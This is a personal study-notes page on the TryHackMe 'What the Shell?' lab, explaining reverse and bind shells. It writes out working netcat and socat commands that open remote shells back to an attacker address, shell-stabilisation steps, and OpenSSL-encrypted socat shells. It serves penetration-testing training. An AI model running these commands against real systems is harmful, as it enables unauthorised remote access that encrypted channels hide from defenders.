📞
Contrxl
External Links
Theoretical Learning
Theoretical Learning
  • 🏡Home
  • 📰News & Information
  • Systems Administration
    • ⌨️Cisco
      • Networking Basics
        • Communication in a Connected World
        • Network Components, Types and Connections
        • Wireless and Mobile Networks
        • Home Networking Technologies
        • Communication Protocols
        • Network Media
        • The Access Layer
        • The Internet Protocol
        • IPv4 and Network Segmentation
    • 🎓Learning Links
    • 💻Microsoft
      • AZ-900
        • 1. Cloud Concepts
          • 1.1 Describe Cloud Computing
            • 1.1.1 Introduction - Cloud Computing
            • 1.1.2 What is Cloud Computing?
            • 1.1.3 The Shared Responsibility Model
            • 1.1.4 Define Cloud Models
            • 1.1.5 Define the Consumption based Model
            • 1.1.6 Summary - Cloud Computing
          • 1.2 Describe the Benefits of Cloud Services
            • 1.2.1 Introduction - Cloud Services
            • 1.2.2 Benefits of High Availability and Scalability
            • 1.2.3 Benefits of Reliability and Predictability
            • 1.2.4 Benefits of Security and Governance
            • 1.2.5 Manageability in the Cloud
            • 1.2.6 Summary - Cloud Services
          • 1.3 Describe Cloud Service Types
            • 1.3.1 Introduction - Cloud Service Types
            • 1.3.2 Describe Infrastructure as a Service
            • 1.3.3 Describe Platform as a Service
            • 1.3.4 Describe Software as a Service
            • 1.3.5 Summary - Cloud Service Types
        • 2. Architecture
          • 2.1 Core Architectural Components
            • 2.1.1 Introduction - Core Architectural Components
            • 2.1.2 What is Microsoft Azure
            • 2.1.3 Get Started with Azure Accounts
            • 2.1.4 Explore the Learn Sandbox
            • 2.1.5 Describe Azure Physical Infrastructure
            • 2.1.6 Describe Azure Management Infrastructure
            • 2.1.7 Create an Azure Resource
            • 2.1.8 Summary
          • 2.2 Compute and Networking
            • 2.2.1 Introduction - Compute and Networking
            • 2.2.2 Describe Azure VMs
            • 2.2.3 Create an Azure VM
            • 2.2.4 Describe Azure Virtual Desktop
            • 2.2.5 Describe Azure Containers
            • 2.2.6 Describe Azure Functions
            • 2.2.7 Describe Application Hosting Options
            • 2.2.8 Describe Azure Virtual Networking
            • 2.2.9 Configure Network Access
            • 2.2.10 Describe Azure VPNs
            • 2.2.11 Describe Azure ExpressRoute
            • 2.2.12 Describe Azure DNS
            • 2.2.13 Summary - Compute and Networking
          • 2.3 Azure Storage Services
            • 2.3.1 Introduction - Storage Services
            • 2.3.2 Describe Azure Storage Accounts
            • 2.3.3 Describe Azure Storage Redundancy
            • 2.3.4 Describe Azure Storage Services
            • 2.3.5 Create a Storage Blob
            • 2.3.6 Identify Azure Data Migration Options
            • 2.3.7 Identify Azure File Movement Options
            • 2.3.8 Summary - Storage Services
        • 3. Management and Governance
          • 3.1 Cost Management
            • 3.1.1 Introduction - Cost Management
            • 3.1.2 Describe Factors that can Affect Costs in Azure
            • 3.1.3 Compare Pricing and TCO Calculators
            • 3.1.4 Estimate Workload Costs
            • 3.1.5 Compare Workload Costs with TCO
            • 3.1.6 Describe the Microsoft Cost Management Tool
            • 3.1.7 Describe the Purpose of Tags
            • 3.1.8 Summary - Cost Management
          • 3.2 Governance and Compliance
            • 3.2.1 Introduction - Compliance and Governance
            • 3.2.2 Describe the Purpose of Microsoft Purview
            • 3.2.3 Describe the Purpose of Azure Policy
            • 3.2.4 Describe the Purpose of Resource Locks
            • 3.2.5 Configure a Resource Lock
            • 3.2.6 Describe the Purpose of the Service Trust Portal
            • 3.2.7 Summary - Compliance and Governance
          • 3.3 Tools for Managing Azure Resources
            • 3.3.1 Introduction - Tools for Managing Azure Resources
            • 3.3.2 Describe Tools for Interacting with Azure
            • 3.3.3 Describe the Purpose of Azure Arc
            • 3.3.4 Describe ARM and Azure ARM Templates
            • 3.3.5 Summary - Tools for Managing Azure Resources
          • 3.4 Monitoring Tools
            • 3.4.1 Introduction - Monitoring Tools
            • 3.4.2 Describe the Purpose of Azure Advisor
            • 3.4.3 Describe Azure Service Health
            • 3.4.4 Describe Azure Monitor
    • 📘Microsoft Portal Links
  • Cybersecurity
    • ❓Anonymity Tools
    • 💡OSINT
      • IP & Domain OSINT
      • Email & Username OSINT
      • Vulnerability OSINT
    • 📚Projects
      • ‼️A Simulation Study of DDoS
  • 🦈Hacking
    • ☁️Cloud Attack Vectors
      • Credential Harvesting
      • Privilege Escalation
      • Account Takeover
      • Metadata Service Attacks
      • Misconfigured Cloud Assets
      • Resource Exhaustion and DoS
      • Cloud Malware Injection Attacks
      • Side-Channel Attacks
    • Maintaining Persistence
      • Reverse and Bind Shells
      • Command and Control (C2) Utilities
      • Scheduled Jobs, Tasks and Custom Daemons
    • 💻Network-Based Vulnerabilities
      • Windows Name Resolution and SMB
      • DNS Cache Poisoning
      • SNMP
      • SMTP
      • FTP
      • Pass-the-Hash
      • Kerberos and LDAP-Based Attacks
      • On-Path
      • Route Manipulation
      • DoS and DDoS
      • NAC Bypass
      • VLAN Hopping
      • DHCP Starvation/Rogue DHCP Server
    • Pivoting
      • Post-Exploitation Scanning
      • Legitimate Utilities and LotL
      • Privilege Escalation
    • Specialised System Vulnerabilities
      • Mobile Devices
      • Internet of Things Devices
      • Virtual Machines
      • Containerised Workloads
    • ⚒️Tools
      • Burp Suite
        • Repeater
        • Intruder
        • Other Modules
      • GoPhish
      • Hydra
      • John the Ripper
      • Metasploit
        • Exploitation
        • Meterpreter
      • NMAP
      • Wireshark
    • 🖥️TryHackMe
      • Complete Beginner
        • 1. Complete Beginner Intro
        • 2. Linux Fundamentals
        • 3. Introductory Networking
        • 3.1 Network Exploitation Basics
        • 4. OWASP Top 10 Exploits
        • 5. Upload Vulnerabilities
        • 5.1 An Example Methodology
        • 6. Cryptography - Hashing
        • 7. Cryptography - Encryption
        • 8. Active Directory Basics
        • 9. What the Shell?
        • 10. Linux Privesc
        • 11. More Linux Privesc
      • Jr Penetration Tester
        • Walking an Application
        • Content Discovery
        • Subdomain Enumeration
        • Authentication Bypass
        • IDOR
        • File Inclusion
        • SSRF
        • XSS (Cross-site Scripting)
        • Command Injection
        • SQL Injection
        • Passive Reconnaissance
        • Active Reconnaissance
        • Protocols and Servers
        • Protocol and Server Attacks
        • Vulnerabilities
        • Exploiting Vulnerabilities
        • Linux Privilege Escalation
        • Windows Privilege Escalation
      • CompTIA Pentest+
        • Planning and Scoping
          • Pentesting Fundamentals
          • Red Team Engagements
          • Governance and Regulation
        • Tools and Code Analysis
          • Metasploit: Introduction
          • Wireshark: The Basics
          • Burp Suite: The Basics
          • Hydra
          • Python Basics
        • Attacks and Exploits
          • Phishing
          • Windows Local Persistence
          • Breaching Active Directory
          • Lateral Movement & Pivoting
    • Web Application Vulnerabilities
      • The HTTP Protocol
      • Business Logic Flaws
      • Injection-Based Vulnerabilities
      • Authentication-Based Vulnerabilities
      • Authorisation-Based Vulnerabilities
      • Cross-Site Scripting (XSS)
      • Cross-Site Request Forgery (CSRF/XSRF) and Server-Side Request Forgery (SSRF)
      • Clickjacking
      • Security Misconfigurations
      • File Inclusion Vulnerabilities
      • Insecure Coding Practices
    • Wireless Vulnerabilities
      • Rogue Access Point/Evil Twin
      • Disassociation/Deauthentication
      • Preferred Network List Attack
      • Wireless Signal Jamming
      • War Driving
      • Initialization Vector (IV) and Insecure Wireless Protocol
      • KARMA
      • Fragmentation Attacks
      • Credential Harvesting
      • Bluejacking and Bluesnarfing
      • RFID Attacks
Powered by GitBook
On this page
  • Introduction
  • Reverse Shells
  • Bind Shells
  • Shell Stabilisation
  • Socat Encrypted Shells
  1. Hacking
  2. TryHackMe
  3. Complete Beginner

9. What the Shell?

Section nine in Complete Beginner learning path.

Introduction

At a high level, there are two kinds of shell that are important when exploiting a target: reverse shells, and bind shells.

A reverse shell is when a target is forced to execute code that will connect back to your computer. On your own PC you will need to run a listener to receive the connection. Reverse shells are good to bypass firewall rules, however, you will need to configure your own network to accept the shell.

A bind shell is when the code executed on the target starts a listener attached to a shell on the target. This is then open on the internet which allows you to connect to the open port and obtain RCE. This does not require any configuration on your machine but it may be blocked by firewalls.

Reverse Shells

To set up a very, very basic reverse shell, run the command sudo nc -lvnp [port_number] on your machine, and run the command nc [local_ip] [port_number] -e /bin/bash on the target machine.

The syntax for netcat listener breaks down to:

  • -l:tells netcat it will be a listener

  • -v: request verbose output

  • -n: tells netcat not to resolve hostnames or use DNS

  • -p: indicates port specification follows

If you use a port number below port 1024 you will need to run this using sudo.

For a basic reverse shell listening using socat, the syntax is: socat TCP-L:[port] -. This takes two points and connects them together. We can use the following command on Windows to connect back to this: socat TCP:[LOCAL_IP]:[LOCAL_PORT] EXEC:powershell.exe,pipes. The "pipes" option is used to force PowerShell to use Unix standard input and output. The equivalent command in Linux is: socat TCP:[LOCAL_IP]:[LOCAL_PORT] EXEC:"bash -li".

Bind Shells

To set up a very, very basic bind shell, run the command nc -lvnp [port_number] -e "cmd.exe" on the target machine and run nc [IP_ADDR] [port_number] on your attacking machine.

To get a bind shell socat listener, we can run the following on Linux: socat TCP-L:[PORT] EXEC:"bash -li". On Windows, we can run socat TCP-L:[TARGET_IP]:[TARGET_PORT] to achieve the same result.

Shell Stabilisation

Using Python:

  1. Run python -c 'import pty;pty.spawn("/bin/bash")' which uses Python to spawn a better bash shell. This may depend on the version of python on the machine, to account for this, just replace the initial python with python2 or python3.

  2. Run export TERM=xterm, which will give us access to commands like clear.

  3. Finally, background this shell using CTRL + Z, in your own terminal now use stty raw -echo; fg. This turns off our own terminal echo (giving access to autocompletes, arrow keys and CTRL + C process kill). This foregrounds the shell & completes the process.

Note: if this shell dies you will need to type reset and hit enter to restore your shell.

Using rlwrap:

rlwrap gives access to history, tab autocomplete, and the arrow keys immediately on getting the shell; however, manual stabilisation must be used to be able to use CTRL + C inside the shell. To install this run: sudo apt install rlwrap. To use rlwrap, invoke rlwrap nc -lvnp [port_number].

This method is useful when dealing with Windows shells, when dealing with a Linux target you can fully stabilise by following step 3 of the Python technique; background the shell and run stty raw -echo; fg.

Using Socat:

Socat will only work on Linux for stabilisation. To use this method a socat static compiled binary must be uploaded to the target, this can be done using sudo python3 -m http.server 80 on your attacking machine and wget [IP_ADDR]/socat -O /tmp/socat on the target machine.

With these techniques it can also be useful to change terminal size. To do this, open another terminal and run stty -a, this will show a number of "rows" and "columns". Back in the reverse/bind shell, run stty rows [NUMBER] and then stty cols [NUMBER], replacing [NUMBER] with the values you got from your own terminal.

To get a fully stable Linux tty reverse shell using socat, we can run: socat TCP-L:[PORT] FILE:`tty`,raw,echo=0.

Socat Encrypted Shells

Socat can create both bind and reverse encrypted shells. Encrypted shells cannot be spied on. Firstly, we need to generate a certificate to use encrypted shells, we should run this on our attacking machine:

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt

This creates a 2048 bit RSA key and matching cert, valid for just under a year. When this command runs, it will ask for info, this can be left blank or filled with nonsense. The two created files then need to be merged into a .pem file:

cat shell.key shell.crt > shell.pem

Now, when we set up the reverse shell listener, we use:

socat OPENSSL-LISTEN:[PORT],cert=shell.pem,verify=0

Here, the verify=0 tag tells the connection not to bother trying to validate the certificate. The certificate must be used on whatever device is listening. To connect back to this we use:

socat OPENSSL:[LOCAL_IP]:[LOCAL_PORT],verify=0 EXEC:/bin/bash

The same technique applies for a bind shell, on the target run:

socat OPENSSL-LISTEN:[PORT],cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

On the attacker run:

socat OPENSSL:[TARGET_IP]:[TARGET_PORT],verify=0

Last updated 4 months ago

🦈
🖥️